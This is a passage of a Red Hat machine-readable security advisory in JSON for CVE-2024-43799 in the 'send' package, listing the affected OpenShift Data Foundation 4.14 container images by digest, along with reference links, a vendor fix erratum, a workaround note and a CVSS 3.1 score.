"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-01-15T01:19:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
